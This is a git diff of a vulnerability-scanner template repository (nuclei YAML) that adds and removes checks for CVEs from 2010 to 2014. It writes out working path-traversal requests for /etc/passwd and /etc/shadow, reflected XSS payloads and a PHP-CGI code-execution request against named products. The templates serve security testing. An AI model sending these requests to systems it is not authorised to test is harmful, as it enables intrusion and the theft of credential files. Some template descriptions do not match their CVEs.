- tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-4231.yaml b/nuclei-templates/CVE-2010/cve-2010-4231.yaml new file mode 100644 index 0000000000..58e8e65051 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-4231.yaml @@ -0,0 +1,26 @@ +id: CVE-2010-4231 + +info: + name: Camtron CMNC-200 IP Camera - Directory Traversal + author: daffainfo + severity: high + description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 + - https://www.exploit-db.com/exploits/15505 + tags: cve,cve2010,iot,lfi,camera + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-4239.yaml b/nuclei-templates/CVE-2010/cve-2010-4239.yaml deleted file mode 100644 index 7f6b76880d..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-4239.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2010-4239 - -info: - name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion - author: 0x_akoko - severity: critical - description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability. - impact: | - The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. - remediation: | - Upgrade Tiki Wiki CMS Groupware to a version that is not affected by the CVE-2010-4239 vulnerability. - reference: - - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt - - https://www.openwall.com/lists/oss-security/2010/11/22/9 - - https://security-tracker.debian.org/tracker/CVE-2010-4239 - - https://nvd.nist.gov/vuln/detail/CVE-2010-4239 - - https://access.redhat.com/security/cve/cve-2010-4239 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2010-4239 - cwe-id: CWE-20 - epss-score: 0.03038 - epss-percentile: 0.90751 - cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: tiki - product: tikiwiki_cms\/groupware - tags: cve,cve2010,tikiwiki,lfi,tiki - -http: - - method: GET - path: - - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini" - - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and -# digest: 4a0a00473045022100b5b334a2fec00cf5a3aecc1339951bf57de03095d5f4265c23450b3a0c64bb5c02206338a21c9a89350f86820ccc9f08c7d37697834a200669fe085df7763d730318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-4282.yaml b/nuclei-templates/CVE-2010/cve-2010-4282.yaml new file mode 100644 index 0000000000..889195c6eb --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-4282.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-4282 + +info: + name: phpShowtime 2.0 - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. + reference: + - https://www.exploit-db.com/exploits/15643 + - https://www.cvedetails.com/cve/CVE-2010-4282 + tags: cve,cve2010,lfi,joomla,phpshowtime + +requests: + - method: GET + path: + - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-4617.yaml b/nuclei-templates/CVE-2010/cve-2010-4617.yaml new file mode 100644 index 0000000000..6b8918ae9b --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-4617.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-4617 + +info: + name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/15791 + - https://www.cvedetails.com/cve/CVE-2010-4617 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-4719.yaml b/nuclei-templates/CVE-2010/cve-2010-4719.yaml deleted file mode 100644 index 145fed21d3..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-4719.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-4719 - -info: - name: Joomla! Component JRadio - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/15749 - - https://www.cvedetails.com/cve/CVE-2010-4719 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-4977.yaml b/nuclei-templates/CVE-2010/cve-2010-4977.yaml new file mode 100644 index 0000000000..eb135d7ccc --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-4977.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-4977 + +info: + name: Joomla! Component Canteen 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34250 + - https://www.cvedetails.com/cve/CVE-2010-4977 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-5286.yaml b/nuclei-templates/CVE-2010/cve-2010-5286.yaml deleted file mode 100644 index e27c4edeb5..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-5286.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-5286 - -info: - name: Joomla! Component Jstore - 'Controller' Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/34837 - - https://www.cvedetails.com/cve/CVE-2010-5286 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2011/cve-2011-0049.yaml b/nuclei-templates/CVE-2011/CVE-2011-0049.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-0049.yaml rename to nuclei-templates/CVE-2011/CVE-2011-0049.yaml diff --git a/nuclei-templates/CVE-2011/CVE-2011-1669.yaml b/nuclei-templates/CVE-2011/CVE-2011-1669.yaml new file mode 100644 index 0000000000..709b2ef38d --- /dev/null +++ b/nuclei-templates/CVE-2011/CVE-2011-1669.yaml @@ -0,0 +1,34 @@ +id: CVE-2011-1669 + +info: + name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 + - https://www.exploit-db.com/exploits/17119 + - http://web.archive.org/web/20210121212348/https://www.securityfocus.com/bid/47146/ + - http://www.securityfocus.com/bid/47146 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-1669 + tags: cve,cve2011,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml b/nuclei-templates/CVE-2011/CVE-2011-4336.yaml deleted file mode 100644 index 385c2af2dc..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2011-4336 - -info: - name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting - author: pikpikcu - severity: medium - description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - - http://web.archive.org/web/20210328232945/https://www.securityfocus.com/bid/48806/info - - https://seclists.org/bugtraq/2011/Nov/140 - remediation: Upgrade to a supported version. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2011-4336 - cwe-id: CWE-79 - cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* - epss-score: 0.00182 - tags: seclists,cve,cve2011,xss,tikiwiki - metadata: - max-request: 1 - -http: - - method: GET - path: - - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2011/CVE-2011-4804.yaml b/nuclei-templates/CVE-2011/CVE-2011-4804.yaml new file mode 100644 index 0000000000..e24a860822 --- /dev/null +++ b/nuclei-templates/CVE-2011/CVE-2011-4804.yaml @@ -0,0 +1,34 @@ +id: CVE-2011-4804 + +info: + name: Joomla! Component com_kp - 'Controller' Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/36598 + - https://www.cvedetails.com/cve/CVE-2011-4804 + - http://secunia.com/advisories/46844 + - http://www.securityfocus.com/bid/48944 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-4804 + tags: cve,cve2011,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2011/cve-2011-4336.yaml b/nuclei-templates/CVE-2011/cve-2011-4336.yaml new file mode 100644 index 0000000000..1fe124e5d4 --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-4336.yaml @@ -0,0 +1,38 @@ +id: CVE-2011-4336 + +info: + name: Tiki Wiki CMS Groupware 7.0 has XSS + author: pikpikcu + severity: medium + description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 + - https://www.securityfocus.com/bid/48806/info + - https://seclists.org/bugtraq/2011/Nov/140 + tags: cve,cve2011,xss,tikiwiki + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2011-4336 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2011/cve-2011-4804.yaml b/nuclei-templates/CVE-2011/cve-2011-4804.yaml deleted file mode 100644 index f7dc717b28..0000000000 --- a/nuclei-templates/CVE-2011/cve-2011-4804.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2011-4804 - -info: - name: Joomla! Component com_kp - 'Controller' Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/36598 - - https://www.cvedetails.com/cve/CVE-2011-4804 - tags: cve,cve2011,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0991.yaml b/nuclei-templates/CVE-2012/CVE-2012-0991.yaml new file mode 100644 index 0000000000..3a27e8c3a6 --- /dev/null +++ b/nuclei-templates/CVE-2012/CVE-2012-0991.yaml @@ -0,0 +1,33 @@ +id: CVE-2012-0991 + +info: + name: OpenEMR 4.1 - Local File Inclusion + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. + reference: + - https://www.exploit-db.com/exploits/36650 + - https://www.cvedetails.com/cve/CVE-2012-0991 + - http://osvdb.org/78729 + - http://www.securityfocus.com/bid/51788 + classification: + cve-id: CVE-2012-0991 + tags: cve,cve2012,lfi,openemr,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-1226.yaml b/nuclei-templates/CVE-2012/CVE-2012-1226.yaml deleted file mode 100644 index f16733f1e9..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-1226.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2012-1226 - -info: - name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php. - reference: - - https://www.exploit-db.com/exploits/36873 - - https://www.cvedetails.com/cve/CVE-2012-1226 - - http://www.securityfocus.com/archive/1/521583 - - http://www.vulnerability-lab.com/get_content.php?id=428 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2012-1226 - tags: cve,cve2012,lfi,dolibarr,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2012/CVE-2012-1823.yaml b/nuclei-templates/CVE-2012/CVE-2012-1823.yaml new file mode 100644 index 0000000000..51a45629bc --- /dev/null +++ b/nuclei-templates/CVE-2012/CVE-2012-1823.yaml @@ -0,0 +1,33 @@ +id: CVE-2012-1823 + +info: + name: PHP CGI v5.3.12/5.4.2 RCE + author: pikpikcu + severity: critical + reference: + - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 + - https://nvd.nist.gov/vuln/detail/CVE-2012-1823 + description: | + sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. + + +requests: + - raw: + - | + POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2012/CVE-2012-3153.yaml b/nuclei-templates/CVE-2012/CVE-2012-3153.yaml deleted file mode 100644 index f130b705fd..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-3153.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2012-3153 - -info: - name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153) - author: Sid Ahmed MALAOUI @ Realistic Security - severity: critical - description: | - An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, - 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown - vectors related to Report Server Component. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2012-3152 - - https://www.exploit-db.com/exploits/31737 - - https://www.oracle.com/security-alerts/cpuoct2012.html - - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html - classification: - cve-id: CVE-2012-3153 - tags: cve,cve2012,oracle,rce - -requests: - - method: GET - path: - - "{{BaseURL}}/reports/rwservlet/showenv" - - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///" - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_1, "Reports Servlet")' - - - type: status - status: - - 200 - - - type: dsl - dsl: - - '!contains(body_2, "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2012/CVE-2012-4253.yaml b/nuclei-templates/CVE-2012/CVE-2012-4253.yaml deleted file mode 100644 index e9211386c2..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-4253.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2012-4253 - -info: - name: MySQLDumper 1.24.4 - Directory Traversal - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. - reference: - - https://www.exploit-db.com/exploits/37129 - - https://www.cvedetails.com/cve/CVE-2012-4253 - - http://www.osvdb.org/81609 - - http://www.osvdb.org/81615 - classification: - cve-id: CVE-2012-4253 - tags: cve,cve2012,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/cve-2012-4547.yaml b/nuclei-templates/CVE-2012/CVE-2012-4547.yaml similarity index 100% rename from nuclei-templates/CVE-2012/cve-2012-4547.yaml rename to nuclei-templates/CVE-2012/CVE-2012-4547.yaml diff --git a/nuclei-templates/CVE-2012/cve-2012-4889.yaml b/nuclei-templates/CVE-2012/CVE-2012-4889.yaml similarity index 100% rename from nuclei-templates/CVE-2012/cve-2012-4889.yaml rename to nuclei-templates/CVE-2012/CVE-2012-4889.yaml diff --git a/nuclei-templates/CVE-2012/CVE-2012-5687.yaml b/nuclei-templates/CVE-2012/CVE-2012-5687.yaml new file mode 100644 index 0000000000..498c799731 --- /dev/null +++ b/nuclei-templates/CVE-2012/CVE-2012-5687.yaml @@ -0,0 +1,18 @@ +id: cve-2012-5687 +info: + name: TP-LINK TL-WR841N Local File Inclusion (LFI) + severity: high + author: trainzment + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5687 + classification: + cve-id: CVE-2012-5687 + tags: tp-link,tplink + +http: + - method: GET + path: + - "{{BaseURL}}/help/../../../../../../../../etc/shadow" + matchers: + - type: word + words: + - "root:" diff --git a/nuclei-templates/CVE-2012/cve-2012-0991.yaml b/nuclei-templates/CVE-2012/cve-2012-0991.yaml deleted file mode 100644 index c9bbdc69ff..0000000000 --- a/nuclei-templates/CVE-2012/cve-2012-0991.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2012-0991 - -info: - name: OpenEMR 4.1 - Local File Inclusion - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. - reference: - - https://www.exploit-db.com/exploits/36650 - - https://www.cvedetails.com/cve/CVE-2012-0991 - tags: cve,cve2012,lfi,openemr,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2012/cve-2012-1226.yaml b/nuclei-templates/CVE-2012/cve-2012-1226.yaml new file mode 100644 index 0000000000..262bacd6a8 --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-1226.yaml @@ -0,0 +1,27 @@ +id: CVE-2012-1226 + +info: + name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php. + reference: + - https://www.exploit-db.com/exploits/36873 + - https://www.cvedetails.com/cve/CVE-2012-1226 + tags: cve,cve2012,lfi,dolibarr,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2012/cve-2012-1823.yaml b/nuclei-templates/CVE-2012/cve-2012-1823.yaml deleted file mode 100644 index 0a1111e02c..0000000000 --- a/nuclei-templates/CVE-2012/cve-2012-1823.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2012-1823 - -info: - name: PHP CGI v5.3.12/5.4.2 RCE - author: pikpikcu - severity: critical - reference: - - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 - - https://nvd.nist.gov/vuln/detail/CVE-2012-1823 - description: | - sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. - tags: rce,php,cve,cve2012 - -requests: - - raw: - - | - POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2012/cve-2012-3153.yaml b/nuclei-templates/CVE-2012/cve-2012-3153.yaml new file mode 100755 index 0000000000..d624c59d99 --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-3153.yaml @@ -0,0 +1,47 @@ +id: CVE-2012-3153 + +info: + name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153) + author: Sid Ahmed MALAOUI @ Realistic Security + severity: critical + description: | + Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, + 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown + vectors related to Report Server Component. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-3152 + - https://www.exploit-db.com/exploits/31737 + tags: cve,cve2012,oracle,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/reports/rwservlet/showenv" + - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///" + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_1, "Reports Servlet")' + + - type: status + status: + - 200 + + - type: dsl + dsl: + - '!contains(body_2, "' - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-4592.yaml b/nuclei-templates/CVE-2014/CVE-2014-4592.yaml deleted file mode 100644 index d25c394bc5..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-4592.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2014-4592 -info: - name: WP Planet <= 0.1 - Unauthenticated Reflected XSS - author: daffainfo - severity: medium - reference: | - - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 - - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 - tags: cve,cve2014,wordpress,wp-plugin,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2014-4592 - cwe-id: CWE-79 - description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter." -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2014/CVE-2014-5111.yaml b/nuclei-templates/CVE-2014/CVE-2014-5111.yaml new file mode 100644 index 0000000000..f8a4d0004a --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-5111.yaml @@ -0,0 +1,32 @@ +id: CVE-2014-5111 + +info: + name: Fonality trixbox - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. + reference: + - https://www.exploit-db.com/exploits/39351 + - https://nvd.nist.gov/vuln/detail/CVE-2014-5111 + - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html + classification: + cve-id: CVE-2014-5111 + tags: cve,cve2014,lfi,trixbox + +requests: + - method: GET + path: + - "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-6308.yaml b/nuclei-templates/CVE-2014/CVE-2014-6308.yaml new file mode 100644 index 0000000000..f71050692f --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-6308.yaml @@ -0,0 +1,33 @@ +id: CVE-2014-6308 + +info: + name: Osclass Security Advisory 3.4.1 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php. + reference: + - https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html + - https://nvd.nist.gov/vuln/detail/CVE-2014-6308 + - https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435 + - https://www.netsparker.com/lfi-vulnerability-in-osclass/ + classification: + cve-id: CVE-2014-6308 + tags: cve,cve2014,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/CVE-2014-8682.yaml b/nuclei-templates/CVE-2014/CVE-2014-8682.yaml deleted file mode 